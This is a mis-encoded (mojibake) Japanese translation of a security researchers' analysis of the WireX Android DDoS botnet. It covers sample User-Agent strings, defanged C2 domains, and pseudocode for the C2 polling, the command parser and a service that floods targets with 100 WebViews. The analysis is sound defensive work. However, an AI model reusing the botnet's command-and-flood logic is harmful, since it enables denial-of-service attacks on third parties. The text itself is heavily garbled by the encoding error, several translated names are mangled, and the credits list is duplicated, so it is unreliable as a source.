
2017幎8æ17æ¥ãè€æ°ã®ã³ã³ãã³ããããã€ããŒãšã³ã³ãã³ãé ä¿¡ãããã¯ãŒã¯ïŒCDNïŒãWireXãšåŒã°ããããããããã«ãã£ãŠæ»æãããŸããã WireXããããããã«ã¯äž»ã«Androidããã€ã¹ãå«ãŸããDDoSãã©ãã£ãã¯ãäœæããããã«èšèšãããŠããŸãã æ°æ¥åãGoogleã¯Playã¹ãã¢ã§ããŠã³ããŒãå¯èœãªæ°çŸã®ææããã¢ããªã±ãŒã·ã§ã³ãåé€ãããããããã¹ãŠã®ããã€ã¹ããåé€ããããã»ã¹ãéå§ããŸããã
ã¢ã«ãã€ãCloudflareãFlashpointãGoogleãOracle DynãRiskIQãTeam Cymruãªã©ã®ç 究è ãååããŠãã®ãããããããšæŠã£ãŠããŸãã 蚌æ ã¯ãããããããã8æ2æ¥ã«æ¢ã«ã¢ã¯ãã£ãã§ãã£ãå¯èœæ§ãããããšã瀺ããŠããŸããã8æ17æ¥ã®æ»æã泚ç®ãéããŸããã ãã®èšäºã«ã¯ç·åçãªç¥èãå«ãŸããŠããããããããããç¡å¹ã«ããããã«åããŠããç 究è ã®åªåã«ã€ããŠèª¬æããŠããŸãã
æ»æã®è©³çŽ°
WireXã¯ã8æ2æ¥ã«ããããããã®æåã®çè·¡ãæ»æã®åœ¢ã§æ®ããŸããã ç 究è ããã°å ã®26æåã§æ§æãããUser-Agentãšã³ããªã®æ€çŽ¢ãéå§ãããšãã«çºèŠãããŸããã æåã®æ»æã¯æå°éã§ããããã«ãŠã§ã¢ãéçºäžãŸãã¯å±éã®åæ段éã«ãã£ãå¯èœæ§ããããŸãã 8æ15æ¥ä»¥éãå°ãªããšã70,000åã®IPã¢ãã¬ã¹ãäžéšã«åå ããŠãããé·ãæ»æãæ€åºãããŸããïŒå³1ïŒã
WireXã¯ãã¢ããªã±ãŒã·ã§ã³ã¬ãã«ã®DDoSæ»æã§ãã æ»æããŒãã«ãã£ãŠçæããããã©ãã£ãã¯ã¯äž»ã«HTTP GETãªã¯ãšã¹ãã§ãããäžéšã®ã¢ããªã±ãŒã·ã§ã³ããªã¢ã³ãã¯POSTãªã¯ãšã¹ããçºè¡ã§ããããã§ãã ã€ãŸããããããããã¯ãéåžžã®HTTPã¯ã©ã€ã¢ã³ããšWebãã©ãŠã¶ãŒããã®å®éã®èŠæ±ã«äŒŒããã©ãã£ãã¯ãäœæããŸãã

å³1ïŒ1æéãããã®æ»æäžã«èŠ³æž¬ãããäžæã®IPã¢ãã¬ã¹ã®æ°ã«åºã¥ããæšå®ããããããæé·ã
ãã®ããããããããã®ãã©ãã£ãã¯ã®ã»ãšãã©ã¯ãã©ã³ãã ãªå°æåã®è±åã®åœ¢åŒã®User-Agent HTTPèŠæ±ã䜿çšããŠåºå¥ãããŸããã
ãŠãŒã¶ãŒãšãŒãžã§ã³ããšã³ããªã®äžéšïŒ
User-Agent: jigpuzbcomkenhvladtwysqfxr
User-Agent: yudjmikcvzoqwsbflghtxpanre
User-Agent: mckvhaflwzbderiysoguxnqtpj
User-Agent: deogjvtynmcxzwfsbahirukqpl
User-Agent: fdmjczoeyarnuqkbgtlivsxhwp
User-Agent: yczfxlrenuqtwmavhojpigkdsb
User-Agent: dnlseufokcgvmajqzpbtrwyxih
æ¡åŒµæåã»ããã䜿çšããŠããŸããŸãªé·ãã®User-Agentãšã³ããªãçºè¡ãããã«ãŠã§ã¢ã®äºçš®ãçºèŠãããŸããã 以äžã«äŸã瀺ããŸãã
User-Agent: xlw2ibhqg0i
User-Agent: bg5pdrxhka2sjr1g
User-Agent: 5z5z39iit9damit5czrxf655ok060d544ytvx25g19hcg18jpo8vk3q
User-Agent: fge26sd5e1vnyp3bdmc6ie0
User-Agent: m8al87qi9z5cqlwc8mb7ug85g47u
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1b3)
Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729)
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.7)
Gecko/20071018 BonEcho/2.0.0.7
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_7; en-us)
AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2
æ»æããŒãã®è¿œè·¡
8æ17æ¥ã«DDoSæ»æããŒã¿ãåæãããšãããäžç100ãåœä»¥äžã®ããã€ã¹ãåå ããŠããããšãããããŸãããããã¯ããããããã®ç¹åŸŽã§ã¯ãªãæ©èœã§ãã æ»æè ã®IPã¢ãã¬ã¹ã®ååžãšç¹å¥ãªUser-Agentã¬ã³ãŒãã«ãããç 究è ã¯ä»ã®çµç¹ããã®ãããªæ»æã®ååšã«æ°ä»ããŠãããã被害è ã§ãããšæšæž¬ããŸããã 調æ»ãéå§ããå°é家ã¯ããã®ä»®èª¬ãæ€èšŒããããã«ä»ã®çµç¹ã®ååã«é ŒããŸããã äžç·ã«ã調æ»ã¯æ¥éã«çºå±ãå§ããŸããã ãã°åæã«ãããæ»æããŠããIPã¢ãã¬ã¹ãšæªæã®ããAndroidã¢ããªã®éã®æ¥ç¶ã瀺ãããŸããã
æåã®æ»æãšãã®åŸã®æ»æã«ã¯ãåã眲åãæã€ã¢ããªã±ãŒã·ã§ã³ããã®ãªã¯ãšã¹ããå«ãŸããŠããŸããã ããã«ãããç 究è ã¯Androidã¢ããªã±ãŒã·ã§ã³twdlphqg_v1.3.5_apkpure.com.apkã«ã¢ã¯ã»ã¹ããããããããã®ä»çµã¿ãç解ããé¢é£ããã¢ããªã±ãŒã·ã§ã³ãç¹å®ããããã«ç 究ãéå§ããŸããã æ€çŽ¢ã«ãããåãèè ãŸãã¯åãååãšåçã®èª¬æãæã€èè ããã®ããã«ããã€ãã®ã¢ããªã±ãŒã·ã§ã³ãæããã«ãªããŸããïŒå³2ïŒã æ°ããã¢ããªã±ãŒã·ã§ã³ãèŠã€ãã£ããšããæ©èœã®åæã«åãçµã¿ãŸããã

å³2ïŒåæ§ã®ãã«ãŠã§ã¢ã®æ€çŽ¢çµæã®ã¹ã¯ãªãŒã³ã·ã§ããã
ãããã®ã¢ããªã±ãŒã·ã§ã³ãæåãªã¢ãã€ã«ã¢ããªã¹ãã¢ã§èŠã€ãã£ãå Žåãããã€ããããŸããã ãã«ãŠã§ã¢ã®éç¥ã«å¿ããŠãGoogleã¯æ¬¡ã®ã³ã¡ã³ããæäŸããŸããã
åé¡ã«é¢é£ããçŽ300ã®ã¢ããªã±ãŒã·ã§ã³ãç¹å®ããPlayã¹ãã¢ã§ãããã¯ããŸããã ææãããã¹ãŠã®ããã€ã¹ããããããåé€ããããã»ã¹ãé²ããŠããŸãã ç 究è ã®èª¿æ»çµæãšç¬èªã®åæãçµã¿åãããããšã§ãAndroidãŠãŒã¶ãŒãããé©åã«ä¿è·ããããšãã§ããŸããã
ãã«ãŠã§ã¢ã®æŠèŠ
ã¢ããªã±ãŒã·ã§ã³ã®å€ãã¯ãã¡ãã£ã¢/ãããªãã¬ãŒã€ãŒãçä¿¡é³ããŸãã¯ãŠãŒãã£ãªãã£ïŒãã¡ã€ã«ãããŒãžã£ãŒãã¢ããªã±ãŒã·ã§ã³ã¹ãã¢ãªã©ïŒã®ã«ããŽãªã«å±ããè¿œå ã®æ©èœã¯ãšã³ããŠãŒã¶ãŒã«ã¯èŠããŸããã ã¢ããªã±ãŒã·ã§ã³ãèµ·åããããšãæªæã®ããã³ã³ããŒãã³ãã¯ãã³ãã³ããµãŒããŒïŒã»ãšãã©ã®å Žåg.axclick.storeïŒã«æ»æãéå§ããŠæ瀺ããã³ãã³ããèŠæ±ããããšã«ãããäœæ¥ãéå§ããŸããã
DDoSæ»æã«åå ããæ©èœãåããã¢ããªã±ãŒã·ã§ã³ã¯ãããããã€ã³ã¹ããŒã«ãããŠãŒã¶ãŒã«ãšã£ãŠç¡å®³ã§ããã ãããã®ã¢ããªã±ãŒã·ã§ã³ã¯ãAndroidãµãŒãã¹ã¢ãŒããã¯ãã£ã®æ©èœã䜿çšããŠãããããã¢ããªã±ãŒã·ã§ã³ã¯ããã¯ã°ã©ãŠã³ãã§ãã·ã¹ãã ãªãœãŒã¹ã䜿çšã§ããŸãã ãããã£ãŠãã¢ããªã±ãŒã·ã§ã³ã䜿çšãããŠããªããšãã«æ»æãéå§ãããå¯èœæ§ããããŸãã çŸåšãã¢ã³ããŠã€ã«ã¹ã¯ãã®ãã«ãŠã§ã¢ãAndroid Clicker TrojanãšããŠèªèããŠããŸãããã¯ãªãã¯è©æ¬ºãšã¯é¢ä¿ãããŸããã ãã®ãã«ãŠã§ã¢ã¯åæ§ã®è©æ¬ºã«é¢é£ããŠããå¯èœæ§ããããŸããããDDoSæ»æã®ããã«åãããã¡ã€ã«ãããŸããã
ãã«ãŠã§ã¢åæ
ããŸããŸãªéã³ã³ãã€ã«ãããã¢ããªã±ãŒã·ã§ã³ããã§ãã¯ãããšã1ã€ã®ã«ãŒããã¡ã€ã³ïŒaxclick.storeïŒã®ããã€ãã®ãµããã¡ã€ã³ãçºèŠãããŸããããããã®ãµããã¡ã€ã³ã¯ãããããããã®ã³ãã³ãã¢ã³ãã³ã³ãããŒã«ïŒC2ïŒã€ã³ãã©ã¹ãã©ã¯ãã£ã®äžéšã§ãããšæ³å®ãããŠããŸããã
$ grep http * -R com/twdlphqg/app/ExplorationActivity.smali: const-string v3, "http://u[.]axclick[.]store/" com/twdlphqg/app/services/Ryiidrxcjmfb.smali: const-string v1, "http://g[.]axclick[.]store/"
æåã®ãã¡ã€ã³ïŒu [ã] Axclick [ã] StoreïŒã¯ã³ã³ãã³ããè¿ããŸããã§ãããã空ã®200 OKå¿çãéä¿¡ããã€ã³ã¿ãŒãããæ¥ç¶ã®ãã¹ãã«äœ¿çšãããããã§ãã
2çªç®ã®ãã¡ã€ã³ïŒg [ã] Axclick [ã] StoreïŒã¯ããã«ãŠã§ã¢ã®DDoSã³ã³ããŒãã³ãã«é¢é£ããŠããããšãå€æããŸããã ãã®ãã¡ã€ã³ãåç §ããã¢ããªã±ãŒã·ã§ã³ã³ã³ããŒãã³ãã¯ãWebViewã®2ã€ã®ã€ã³ã¹ã¿ã³ã¹ãåããAndroidãµãŒãã¹ã®äœæãæ åœããŸããã Androidã§ã¯ãWebãé²èŠ§ããããã®ç¬èªã®ãŠã£ã³ããŠãäœæããããWebViewèŠçŽ ã䜿çšããŠç¬èªã®ãã©ãŠã¶ã¯ããŒã³ãäœæããããšãã§ããŸãã æåã®WebViewã€ã³ã¹ã¿ã³ã¹ã¯ããŒã³ã³ãšããŠæ©èœããC2ãµãŒããŒãããŒãªã³ã°ããŠæ»æãã£ã¬ã¯ãã£ããæ¢ããŸããã 2çªç®ã¯ãæ»æç®çã§WebViewãè€è£œããããã®ãªã³ã¯ãšããŠæ©èœããŸããã ãã®ã³ã³ããŒãã³ãã«ã¯ããããã®æ»æã€ã³ã¹ã¿ã³ã¹ãæ§æããããžãã¯ãå«ãŸããŠããŸãã
ã³ã³ããŒãã³ãã®æŠèŠ
以äžã§ã¯ãéã³ã³ãã€ã«ãããAPKããååŸããç¥èã«åºã¥ããæ¬äŒŒã³ãŒãã䜿çšããŠãã³ã³ããŒãã³ãã®äžéšãåå¥ã«æ€èšããŸãã
ãµãŒãã¹ã©ã³ããŒ
ã³ã³ããŒãã³ãã®ç®çã¯ãããã¯ã°ã©ãŠã³ãã§ã¢ããªã±ãŒã·ã§ã³ãç¶ç¶ããããšã§ãã ã¢ãã€ã«ããã€ã¹ã®ãŠãŒã¶ãŒã«ãã£ãŠã¢ããªã±ãŒã·ã§ã³ãåæ¢ãããå ŽåããŸãã¯ããã€ã¹ãåèµ·åãããå Žåã«ã®ã¿ãå®è¡ãçµäºããŸãã
ãµãŒãã¹ã©ã³ããŒã®æ¬äŒŒã³ãŒã
Class ServiceRunner extends Object { Public function run() { DDoS_Service->poll_c2(); } }
ããŒãµãŒC2
AttackCommandParserã¯ãããŒãžãããŒããããããšãC2 WebViewãæ€åºãããšéå§ãããŸãã ããŒãµãŒã¯ããŒãžã®ã³ã³ãã³ããããŒãããæ»æããã³ãã³ããšããŠæ¬æãæœåºããŸãã 芳å¯ããããµã³ãã«ã«åºã¥ããŠãC2ããã®ãã€ããŒãã¯æ¬¡ã®ãšããã§ãã
<html> <title> https://A_TARGETED_WEBSITE/snewxwriA_USER_AGENT_STRINGsnewxwrihttps://A_REFER_HEADER_VALUE/ </title> </html>
æ»æã³ãã³ãã®äŸ
次ã«ãã¿ã€ãã«ã¿ã°ããååŸããå€ãString-> containsïŒïŒã§ãã§ãã¯ããŠãsnewxwriåºåãæåãå«ãŸããŠããããšã確èªããŸãã èŠã€ãã£ãå Žåãã³ã³ãã³ãã¯åå²ãããŸãã 次ã«ãçµæã¯ãDDoS_Service-> attackïŒïŒã¡ãœããã«æž¡ãå¿ èŠããããã©ã¡ãŒã¿ãŒãšããŠäœ¿çšãããŸãã
å¿çã®è§£æã³ãŒãã®è§£æ
Class AttackCommandParser extends WebViewClient { Public function onPageFinished(C2_WebView,C2_url) { String pageTitle = C2_WebView->getTitle(); if (pageTitle->contains(âsnewxwriâ) == true) { pageTitle = pageTitle->trim(); Array commandParts = pageTitle.split(âsnewxwriâ); String target = commandParts[0]; String userAgent = commandParts[1]; String referer = commandParts[2]; DDoS_Service->attack(target, userAgent, referer); } } }
DDoSãµãŒãã¹
DDoS_Serviceã³ã³ããŒãã³ãã®äž»ãªæ©èœã¯ãC2 WebViewã§éžæãããæå®ã®URLãWebViewã³ã³ããèªäœã«ããŒãããããã«WebViewãäœæãããã©ãŠã¶ãèµ·åããªãããšã§ãã ãã®åŸãæ»æãéå§ãããŸãã
æ¬äŒŒã³ãŒãDDoSãµãŒãã¹
Class DDoS_Service extends Object { Public function onCreate() { Handler OS_Handler = new Handler(); Object Runner = new ServiceRunner(); OS_Handler->postDelayed(Runner,2); } Public function poll_c2() { WebViewClient C2_Parser = new AttackCommandParser(); WebView C2_WebView = new WebView(); WebViewSettings C2_WebView_Settings = C2_WebView->getSettings(); C2_WebView_Settings->setCacheMode(LOAD_NO_CACHE); C2_WebView->clearCache(true); C2_WebView->clearHistory(); C2_WebView->setWebViewClient(C2_Parser); C2_WebView->loadUrl(âhttp://g[.]axclick[.]storeâ); } Public function attack(String target, String userAgent, String referer) { HashMap WebViewHeaders = new HashMap(); WebViewHeaders->put(âRefererâ,referer); WebViewHeaders->put(âX-Requested-Withâ,ââ); WebView[] AttackerViews = new WebView[100]; for (int i=0; i<AttackerViews.length; i++) { AttackerViews[i] = new WebView(); AttackerViews[i]->clearHistory(); AttackerViews[i]->clearFormData(); AttackerViews[i]->clearCache(true); WebViewSettings AttackWebViewSettings = AttackerViews[i]->getSettings(); AttackWebViewSettings->setJavaScriptEnabled(true); AttackWebViewSettings->setUserAgentString(userAgent); AttackWebViewSettings->setCacheMode(LOAD_NO_CACHE); this->deleteDatabase(âwebview.dbâ); this->deleteDatabase(âwebviewCache.dbâ); AttackerViews[i]->loadUrl(target,WebViewHeaders); } } }
onCreateïŒïŒã¡ãœããã¯ãandroid / os / Handlerããã³ServiceRunnerã®æ°ããã€ã³ã¹ã¿ã³ã¹ãäœæããŸãã poll_c2ïŒïŒã¡ãœããã¯ãC2 URLã䜿çšããŠWebViewãç¶ç¶çã«ãªããŒãããŸãã C2ãã¡ã€ã³ãããŒãªã³ã°ããåã«ããµãŒãã¹ã¯ãã£ãã·ã¥ãã¯ãªã¢ããŠç¡å¹ã«ããWebViewã€ã³ã¹ã¿ã³ã¹ã®å±¥æŽãã¯ãªã¢ããŸãã ãããã®æé ã¯ãã¯ã©ã€ã¢ã³ããåžžã«é¢é£æ å ±ãåä¿¡ãããã£ãã·ã¥ã䜿çšããŠãªã¯ãšã¹ããåŠçããªãããã«ããããã«å®è¡ãããŸãã attackïŒïŒã¡ãœããã¯ãå®éã®æ»æãã©ãã£ãã¯ãçæããŸãã
ãã«ãŠã§ã¢ã®ãŠãŒã¶ãŒãšã¯ã¹ããªãšã³ã¹
ææããã¢ããªã±ãŒã·ã§ã³ã®å€ãã¯æ¢ã«Google Playã¹ãã¢ããåé€ãããŠããŸãããAPKãã¡ã€ã«ãããŠã³ããŒãã§ãããã©ãŒããããã¯ãŒã¯äžã«æ®ã£ãŠããŸãã Android Lollipopãš2015ã»ãã¥ãªãã£ãããã䜿çšããŠãç©ççãªSamsung Galaxy S4ã«ãtwdlphqgãïŒæ»æã¢ããªã®1ã€ïŒãããŠã³ããŒãããŸããã

ãã®ã¢ããªã±ãŒã·ã§ã³ã¯ããã¹ãããä»ã®ã¢ããªã±ãŒã·ã§ã³ãšåæ§ã«ããDevice AnalysisãããData StorageãããPackage Managerããªã©ã®ç¡å®³ãªååãæã¡ãŸããã
ã¢ããªã±ãŒã·ã§ã³ãèµ·åãããšãåçŽãªçä¿¡é³ã¢ããªã±ãŒã·ã§ã³ã®ããã«èŠããŸãã 3ã€ã®çä¿¡é³ã®ã¿ãæäŸãããŸãã çä¿¡é³ãåçããã³èšå®ã§ããä»ã®æ©èœã¯ãããŸããã

ãã®ã¢ããªã±ãŒã·ã§ã³ã¯ãé»è©±ã¹ã¯ãªãŒã³ãããã¯ãããŠããå Žåã§ããåäœãç¶ç¶ããDDoSæ»æã«åå ã§ããè¿œå ã®ããã»ã¹ãããã¯ã°ã©ãŠã³ãã§èµ·åããŸãã é»è©±ãå é»åšã«ã¹ãªãŒãã¢ãŒãã«ãããšããDDoSæ»æã®åå ãšãªãããã»ã¹ã¯åæ¢ããŸããã§ããã

Googleã®PlayProtectæ©èœããããããããã¯ãããããçŸæç¹ã§ã¯ãããã®ã¢ããªã±ãŒã·ã§ã³ãã€ã³ã¹ããŒã«ããããšãäžå¯èœã§ããããšã¯æ³šç®ã«å€ããŸãã ç¹å®ããããã¹ãŠã®ã¢ããªã±ãŒã·ã§ã³ã¯ãããã€ã¹ããåé¡ã®ããã€ã³ã¹ããŒã«æžã¿ã®ã¢ããªã±ãŒã·ã§ã³ãåé€ãããã£ã³ããŒã³ã®äžéšã«ãªããŸããã 次ã«ããã®ãã«ãŠã§ã¢ãå®è¡ããã«ã¯ãèšå®ã§PlayProtectãç¡å¹ã«ããå¿ èŠããããŸãã

ãããã«
ãããã®çºèŠã¯ãããŸããŸãªITçµç¹éã®ã³ã©ãã¬ãŒã·ã§ã³ã®ãããã§ã®ã¿å¯èœã«ãªããŸããã ããããã«ç¬èªã®ããºã«ã®ããŒã¹ããããŸãããåäŒæ¥ã®è²¢ç®ããªããã°ããã®ããããããã¯ããããé·ãéè¬ã®ãŸãŸã§ããã
çµç¹ãDDoSæ»æã§ã§ããããšã¯ãæ»æã«é¢é£ãã詳现ãªã¡ããªãã¯ãå ±æããããšã§ãã ãã®æ å ±ã«ããã DDoSä¿è·ãå°éãšãã人ã ã¯ãããå€ãã®ããšãåŠã³ãæªåœ±é¿ãæå°éã«æããããšãã§ããŸãã
æçšãªæ å ±ã«ã¯ããã£ããã£ããããã±ãããæ»æIPã¢ãã¬ã¹ã®ãªã¹ãã身代éèšé²ããªã¯ãšã¹ãããããŒãçããããã¿ãŒã³ãªã©ããããŸãã ãã©ã€ãã·ãŒã®åé¡ãæå°éã«æããããã«ããŸããã®ãããªãã©ãã£ãã¯ãåæãé ãããå¯èœæ§ãããããããã®ãããªããŒã¿ã«ã¯æ£åœãªã¯ã©ã€ã¢ã³ããã©ãã£ãã¯ãå«ããªãã§ãã ããã ãããŠæãéèŠãªããšã¯ããã®ããŒã¿ããå¿ èŠãªçµéšã®ããå¹ åºãITã»ãã¥ãªãã£ã³ãã¥ããã£ã®ä¿¡é Œã§ããé£çµ¡å ã«è»¢éããèš±å¯ãäžããããšã§ãã
AkamaiãCloudflareãFlashpointãGoogleãRiskIQãTeam CymruãFBIãããã³ãªã¹ãã«èŒã£ãŠããªãä»ã®çµç¹ã®ç 究è
ãžã®æè¬ã
ãã£ã ãšã€ããªã«ïŒã¢ã«ãã€ã®ã·ãã¢ã»ãã¥ãªãã£ã¢ãŒããã¯ã
ã¯ãªã¹ãã€ã«ãŒïŒè åšã€ã³ããªãžã§ã³ã¹ããªã³ã·ãã«@ Oracle Dyn
ãããã»ãã£ãã¶ãŒãº
ãã€ã¡ã»ã³ã¯ã©ã³ïŒã»ãã¥ãªãã£ã¢ããªã¹ã@ Cloudflare
ãã¬ã¯ã»ãã€ã³ãã¹ããŒïŒç±ççãªãªã¿ã¯@ Cloudflare
Jared MauchïŒã€ã³ã¿ãŒãããã¯ãŒãã³ã°èª¿æ»ãšã¢ãŒããã¯ãã£@ Akamai
ã¢ãªãœã³ãã¯ãœã³ïŒã»ãã¥ãªãã£ãªãµãŒããã£ã¬ã¯ã¿ãŒ@ãã©ãã·ã¥ãã€ã³ã
ãžã£ã¹ãã£ã³ã»ãã€ã³ïŒCloudflareã®ä¿¡é Œãšå®å šã®è²¬ä»»è
ãã£ãã»ã·ãŒãã³ïŒäžé¢è°å¡ ã»ãã¥ãªãã£ã€ã³ããªãžã§ã³ã¹ã¬ã¹ãã³ã¹ããŒã ãšã³ãžãã¢@ Akamai SIRT
ãã¬ã³ã»ã¹ããªã¥ãšã«ïŒè åšç 究è @ RiskIQ
ã¶ãã¯ã»ãŠã£ã¯ãã«ã ïŒç 究éçºè @ãã©ãã·ã¥ãã€ã³ã
ãã®ä»ã
ã¯ãªã¹ãã€ã«ãŒïŒè åšã€ã³ããªãžã§ã³ã¹ããªã³ã·ãã«@ Oracle Dyn
ãããã»ãã£ãã¶ãŒãº
ãã€ã¡ã»ã³ã¯ã©ã³ïŒã»ãã¥ãªãã£ã¢ããªã¹ã@ Cloudflare
ãã¬ã¯ã»ãã€ã³ãã¹ããŒïŒç±ççãªãªã¿ã¯@ Cloudflare
Jared MauchïŒã€ã³ã¿ãŒãããã¯ãŒãã³ã°èª¿æ»ãšã¢ãŒããã¯ãã£@ Akamai
ã¢ãªãœã³ãã¯ãœã³ïŒã»ãã¥ãªãã£ãªãµãŒããã£ã¬ã¯ã¿ãŒ@ãã©ãã·ã¥ãã€ã³ã
ãžã£ã¹ãã£ã³ã»ãã€ã³ïŒCloudflareã®ä¿¡é Œãšå®å šã®è²¬ä»»è
ãã£ãã»ã·ãŒãã³ïŒäžé¢è°å¡ ã»ãã¥ãªãã£ã€ã³ããªãžã§ã³ã¹ã¬ã¹ãã³ã¹ããŒã ãšã³ãžãã¢@ Akamai SIRT
ãã¬ã³ã»ã¹ããªã¥ãšã«ïŒè åšç 究è @ RiskIQ
ã¶ãã¯ã»ãŠã£ã¯ãã«ã ïŒç 究éçºè @ãã©ãã·ã¥ãã€ã³ã
ãã®ä»ã